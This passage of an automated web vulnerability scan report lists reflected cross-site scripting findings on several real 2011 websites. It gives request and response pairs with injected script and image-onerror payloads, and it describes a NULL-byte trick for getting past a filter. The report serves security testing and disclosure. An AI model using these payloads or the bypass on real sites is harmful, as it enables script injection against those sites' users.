Set-Cookie: netseer_v3_gi="1005,11065,www.lifescript.com,0,0,1,imp3fed8bc94363e849,1311276197526,"; Version=1; Domain=.netseer.com; Max-Age=31536000; Expires=Fri, 20-Jul-2012 19:23:17 GMT; Path=/
Set-Cookie: netseer_v3_vi="2:usre43bc794a5e34d6f:1311276179410"; Version=1; Domain=.netseer.com; Max-Age=31536000; Expires=Fri, 20-Jul-2012 19:23:17 GMT; Path=/
Set-Cookie: netseer_v3_lvi="2:usre43bc794a5e34d6f:1311276179410,1311276197527,aHR0cDovL3d3dy5saWZlc2NyaXB0LmNvbS9oZWFsdGgvY29uZGl0aW9ucy9hZGQvaG93X3RvX3F1aWV0X3RoZV9zeW1wdG9tc19vZl9hZHVsdF9hZGhkLmFzcHg,US-TX-623-Dallas,0,0"; Version=1; Domain=.netseer.com; Max-Age=31536000; Expires=Fri, 20-Jul-2012 19:23:17 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 21 Jul 2011 19:23:17 GMT
Content-Length: 9412


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>

   <script>
function submitsearch() {
   var searchbox = document.getElementById('search_box'
...[SNIP]...
52/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=pencil;tile=20;~sscs=?aeab6"><script>alert(1)</script>1e5a96efa2http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=11065&iid=imp3fed8bc94363e849&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adul
...[SNIP]...

3.53. http://dinclinx.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dinclinx.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3e5f2<script>alert(1)</script>9544fab98de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?s=103&e=0&t=21&f=javascript&3e5f2<script>alert(1)</script>9544fab98de=1 HTTP/1.1
Host: dinclinx.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 22 Jul 2011 20:13:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 22 Jul 2011 20:13:30 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 69

// Error: Unknown parameter 3e5f2<script>alert(1)</script>9544fab98de

3.54. http://event.adxpose.com/event.flow [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload fb0a5<script>alert(1)</script>94af7ff54fd was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&uid=amRZRPmRXMjwy5CP_10671987fb0a5<script>alert(1)</script>94af7ff54fd&xy=0%2C0&wh=728%2C90&vchannel=610&cid=acerno&iad=1311428805773-56517315376549960&cookieenabled=1&screenwh=1920%2C1200&adwh=728%2C90&colordepth=32&flash=10.3&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220?t=1311428802392&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=6805757a-ba62-4ca3-815c-dec40d38f03a

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=356E3A397C093437191E68EA4107E03E; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 147
Date: Sat, 23 Jul 2011 13:49:04 GMT

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("amRZRPmRXMjwy5CP_10671987fb0a5<script>alert(1)</script>94af7ff54fd");

3.55. http://home.myyearbook.com/Countries [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://home.myyearbook.com
Path:   /Countries

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload %00d6faf<script>alert(1)</script>ecefbf78900 was submitted in the callback parameter. This input was echoed as d6faf<script>alert(1)</script>ecefbf78900 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /Countries?callback=jsonp1311271115649%00d6faf<script>alert(1)</script>ecefbf78900 HTTP/1.1
Host: home.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 17:59:15 GMT
Server: Apache
Set-Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; path=/; domain=.myyearbook.com
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP COR CURa OUR STP UNI"
Expires: Fri, 22 Jul 2011 17:59:15 GMT
Etag: 9929a004e133f519aee5127443e199ec
Vary: Accept-Encoding
Connection: close
Content-Type: application/javascript
X-MyPoolMember: 10.100.10.193
Content-Length: 9574

jsonp1311271115649.d6faf<script>alert(1)</script>ecefbf78900({"countryList":[{"id":3,"code":"AF","name":"AFGHANISTAN"},{"id":4,"code":"AX","name":"ALAND ISLANDS"},{"id":5,"code":"AL","name":"ALBANIA"},{"id":6,"code":"DZ","name":"ALGERIA"},{"id":7,"code":"AS","n
...[SNIP]...

3.56. http://home.myyearbook.com/feed/giftFeedItems [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://home.myyearbook.com
Path:   /feed/giftFeedItems

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 69b90<img%20src%3da%20onerror%3dalert(1)>f128adf2cac was submitted in the REST URL parameter 2. This input was echoed as 69b90<img src=a onerror=alert(1)>f128adf2cac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /feed/giftFeedItems69b90<img%20src%3da%20onerror%3dalert(1)>f128adf2cac?callback=jsonp1311271115651 HTTP/1.1
Host: home.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 17:59:50 GMT
Server: Apache
Set-Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; path=/; domain=.myyearbook.com
Expires: Thu, 21 Jul 2011 18:14:50 GMT
Last-Modified: Thu, 21 Jul 2011 17:55:05 GMT
Etag: aedd7834fdcc696d5a9e2d79a792b098
Content-Length: 124
Connection: close
Content-Type: text/javascript;charset=UTF-8
X-MyPoolMember: 10.100.20.99

hblFeed({"error":true,"Message":"Invalid Feed Item Requested: giftFeedItems69b90<img src=a onerror=alert(1)>f128adf2cac"});

3.57. http://home.myyearbook.com/feed/myMagFeedItems [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://home.myyearbook.com
Path:   /feed/myMagFeedItems

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a69db<img%20src%3da%20onerror%3dalert(1)>b240730221e was submitted in the REST URL parameter 2. This input was echoed as a69db<img src=a onerror=alert(1)>b240730221e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /feed/myMagFeedItemsa69db<img%20src%3da%20onerror%3dalert(1)>b240730221e?callback=jsonp1311271115652 HTTP/1.1
Host: home.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:00:09 GMT
Server: Apache
Set-Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; path=/; domain=.myyearbook.com
Expires: Thu, 21 Jul 2011 18:15:09 GMT
Last-Modified: Thu, 21 Jul 2011 18:00:04 GMT
Etag: 72ee677033a252199b44f29084641c6f
Content-Length: 125
Connection: close
Content-Type: text/javascript;charset=UTF-8
X-MyPoolMember: 10.100.20.98

hblFeed({"error":true,"Message":"Invalid Feed Item Requested: myMagFeedItemsa69db<img src=a onerror=alert(1)>b240730221e"});

3.58. http://home.myyearbook.com/feed/tvFeedItems [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://home.myyearbook.com
Path:   /feed/tvFeedItems

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 84802<img%20src%3da%20onerror%3dalert(1)>b41c649be67 was submitted in the REST URL parameter 2. This input was echoed as 84802<img src=a onerror=alert(1)>b41c649be67 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /feed/tvFeedItems84802<img%20src%3da%20onerror%3dalert(1)>b41c649be67?callback=jsonp1311271115650 HTTP/1.1
Host: home.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 17:59:36 GMT
Server: Apache
Set-Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; path=/; domain=.myyearbook.com
Expires: Thu, 21 Jul 2011 18:14:36 GMT
Last-Modified: Thu, 21 Jul 2011 17:55:05 GMT
Etag: cbecd414d090ef14541c17fa8dc0dbfb
Content-Length: 122
Connection: close
Content-Type: text/javascript;charset=UTF-8
X-MyPoolMember: 10.100.20.99

hblFeed({"error":true,"Message":"Invalid Feed Item Requested: tvFeedItems84802<img src=a onerror=alert(1)>b41c649be67"});

3.59. http://i1.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://i1.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4b5a3<img%20src%3da%20onerror%3dalert(1)>681c7b7ef9d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4b5a3<img src=a onerror=alert(1)>681c7b7ef9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/Widgets/SearchBox.jss?appid=1004&scopeid=1&boxId=searchBox&btnId=searchImg&watermark=Search%20the%20Visual%20Studio%20Gallery&overrideWatermark=true&searchLocation=%2fsite%2fsearch&allowEmptySearch=true&focusOnInit=false&minimumTermLength=4&paramsCallback=Galleries.searchIntellisense.getCallbackParams&4b5a3<img%20src%3da%20onerror%3dalert(1)>681c7b7ef9d=1 HTTP/1.1
Host: i1.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://visualstudiogallery.msdn.microsoft.com/site/search?f%5B0%5D.Type=User&f%5B0%5D.Value=Mike%20Barnett
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_vnum=1313879445324%26vn%3D1; mcI=Thu, 28 Jul 2011 23:06:08 GMT; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00&GO=12; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311338483550:ss=1311338373379; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=c7afbaee-3910-41b0-9f73-42c5d519d743&Microsoft.CreationDate=07/23/2011 02:01:25&Microsoft.LastVisitDate=07/23/2011 02:03:22&Microsoft.NumberOfVisits=2&SessionCookie.Id=48B6F0A73328302A2806841DC13E324C; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/23/2011 02:03:22&Microsoft.VisitStartDate=07/23/2011 02:01:25&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=111&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=b6d6365d4e204cf6ab451e30a23dcb6b; msdn=L=1033

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
ETag: 0a33ba4d88cdfe4151d6837db4809742
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB34
Vary: Accept-Encoding
Cache-Control: public, max-age=43200
Expires: Sat, 23 Jul 2011 14:04:42 GMT
Date: Sat, 23 Jul 2011 02:04:42 GMT
Content-Length: 12970
Connection: close


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
:true,"appId":"1004","boxId":"searchBox","btnId":"searchImg","focusOnInit":false,"maxTerms":null,"minimumTermLength":4,"paramsCallback":"Galleries.searchIntellisense.getCallbackParams","queryParams":"&4b5a3<img src=a onerror=alert(1)>681c7b7ef9d=1","scopeId":"1","searchLocation":"\/site\/search","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search the Visual Studio Gallery"}} ).init();});
...[SNIP]...

3.60. http://i1.services.social.s-msft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://i1.services.social.s-msft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e4d8d<img%20src%3da%20onerror%3dalert(1)>6a38d9abc96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e4d8d<img src=a onerror=alert(1)>6a38d9abc96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/Widgets/SearchBox.jss?boxid=SearchTextBox&btnid=SearchButton&brand=Msdn&loc=en-US&resref=&addEnglish=&rn=&rq=&watermark=&focusOnInit=False&beta=0&iroot=vstudio&cver=0001&e4d8d<img%20src%3da%20onerror%3dalert(1)>6a38d9abc96=1 HTTP/1.1
Host: i1.services.social.s-msft.com
Proxy-Connection: keep-alive
Referer: http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
ntCoent-Length: 12968
Content-Type: application/x-javascript
ETag: 41298f3245820050c97226acfb180f23
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB35
Content-Length: 12968
Cache-Control: public, max-age=43200
Expires: Sat, 23 Jul 2011 14:01:23 GMT
Date: Sat, 23 Jul 2011 02:01:23 GMT
Connection: close
Vary: Accept-Encoding


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
px_searchBox({"allowEmptySearch":false,"appId":"1","boxId":"SearchTextBox","btnId":"SearchButton","focusOnInit":false,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&beta=0&e4d8d<img src=a onerror=alert(1)>6a38d9abc96=1","scopeId":"9","searchLocation":"http:\/\/social.MSDN.microsoft.com\/Search\/en-US\/vstudio","serviceUri":"http:\/\/services.social.s-msft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search
...[SNIP]...

3.61. http://i2.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://i2.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 64f56<img%20src%3da%20onerror%3dalert(1)>582d4e0387 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 64f56<img src=a onerror=alert(1)>582d4e0387 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/Widgets/SearchBox.jss?boxid=ctl00_Masthead_Search_SearchTextBox&btnid=ctl00_Masthead_Search_SearchButton&brand=MSDN&loc=en-us&focusOnInit=true&Refinement=118&watermark=MSDN%20Magazine&64f56<img%20src%3da%20onerror%3dalert(1)>582d4e0387=1 HTTP/1.1
Host: i2.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/magazine/ee336135.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_vnum=1313879445324%26vn%3D1; mcI=Thu, 28 Jul 2011 23:06:08 GMT; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00&GO=12; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311338483550:ss=1311338373379; s_cc=true; s_sq=%5B%5BB%5D%5D; msdn=L=1033; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=c7afbaee-3910-41b0-9f73-42c5d519d743&Microsoft.CreationDate=07/23/2011 02:01:25&Microsoft.LastVisitDate=07/23/2011 02:07:21&Microsoft.NumberOfVisits=5&SessionCookie.Id=48B6F0A73328302A2806841DC13E324C; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/23/2011 02:07:21&Microsoft.VisitStartDate=07/23/2011 02:01:25&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=114&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=b6d6365d4e204cf6ab451e30a23dcb6b; ADS=SN=175A21EF

Response

HTTP/1.1 200 OK
ntCoent-Length: 13021
Content-Type: application/x-javascript
ETag: 2ed89b2cf89d47ef6d93c5da4147901c
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB30
Content-Length: 13021
Cache-Control: public, max-age=43200
Expires: Sat, 23 Jul 2011 14:08:06 GMT
Date: Sat, 23 Jul 2011 02:08:06 GMT
Connection: close
Vary: Accept-Encoding


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
"boxId":"ctl00_Masthead_Search_SearchTextBox","btnId":"ctl00_Masthead_Search_SearchButton","focusOnInit":true,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&Refinement=118&64f56<img src=a onerror=alert(1)>582d4e0387=1","scopeId":"9","searchLocation":"http:\/\/social.MSDN.microsoft.com\/Search\/en-US","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search MSDN M
...[SNIP]...

3.62. http://i3.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://i3.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 49dd0<img%20src%3da%20onerror%3dalert(1)>9604d92119d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 49dd0<img src=a onerror=alert(1)>9604d92119d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/Widgets/SearchBox.jss?boxid=HeaderSearchTextBox&btnid=HeaderSearchButton&brand=MSDN&loc=en-us&watermark=MSDN&focusOnInit=false&49dd0<img%20src%3da%20onerror%3dalert(1)>9604d92119d=1 HTTP/1.1
Host: i3.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/devlabs/dd491992.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; 